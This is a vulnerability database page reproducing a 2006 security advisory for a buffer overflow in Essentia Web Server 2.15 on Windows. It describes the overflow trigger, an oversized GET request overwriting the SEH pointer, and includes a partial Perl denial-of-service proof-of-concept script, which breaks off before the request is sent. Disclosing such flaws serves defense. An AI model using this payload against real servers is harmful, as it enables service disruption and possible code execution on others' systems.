Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

essentia215.txt

๐Ÿ—“๏ธย 06 Nov 2006ย 00:00:00Reported byย CorryLTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 24ย Views

Essentia Web Server V 2.15, Windows platform, Buffer overflow vulnerability allows remote code execution

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`-=[--------------------ADVISORY-------------------]=-  
  
Essentia Web Server V 2.15  
  
Author:CorryL x0n3-h4ck.org  
-=[----------------------------------------------------]=-  
  
  
-=[+] Application: Essentia Web Server  
-=[+] Version: 2.15  
-=[+] Vendor's URL: http://www.essencomp.com  
-=[+] Platform: Windows   
-=[+] Bug type: Buffer overflow  
-=[+] Exploitation: Remote   
-=[-]  
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~  
-=[+] Reference: www.x0n3-h4ck.org  
-=[+] Virtual Office: http://www.kasamba.com/CorryL  
  
..::[ Descriprion ]::..  
  
Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.  
  
..::[ Bug ]::..  
  
This software is affection from a buffer overflow  
what it would allow an attacker to perform arbitrary code  
on the system victim.  
Sending a GET+Ax6800 request, he would succeed   
to write above the seh point.  
  
..::[ Proof Of Concept ]::..  
  
#!/usr/bin/perl  
  
  
use IO::Socket;  
  
use Getopt::Std; getopts('h:', \%args);  
  
  
  
if (defined($args{'h'})) { $host = $args{'h'}; }  
  
print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";  
  
print STDERR "-=[ Discovered By CorryL [email protected] ]=-\n";  
  
print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";  
  
if (!defined($host)) {  
  
Usage();  
  
}  
  
$dos = "A"x6800;  
  
print "[+] Connect to $host\n";  
  
$socket = new IO::Socket::INET (PeerAddr => "$host",  
  
PeerPort => 80,  
  
Proto => 'tcp');  
  
die unless $socket;  
  
print "[+] Sending DOS byte\n";  
  
$data = "GET /$dos \r\n\r\n";  
  
  
..::[ Workaround ]::..  
  
nothing  
  
..::[ Disclousure Timeline ]::..  
  
[30/10/2006] - Vendor notification  
[04/11/2006] ย– No Vendor Response  
[04/11/2006] - Public disclousure  
  
  
  
  
*********************  
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!  
Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4
essentia web serverwindowsbuffer overflowremote code executioncorrylx0n3-h4ck.orgvendor notificationpublic disclosure
24
.json
Report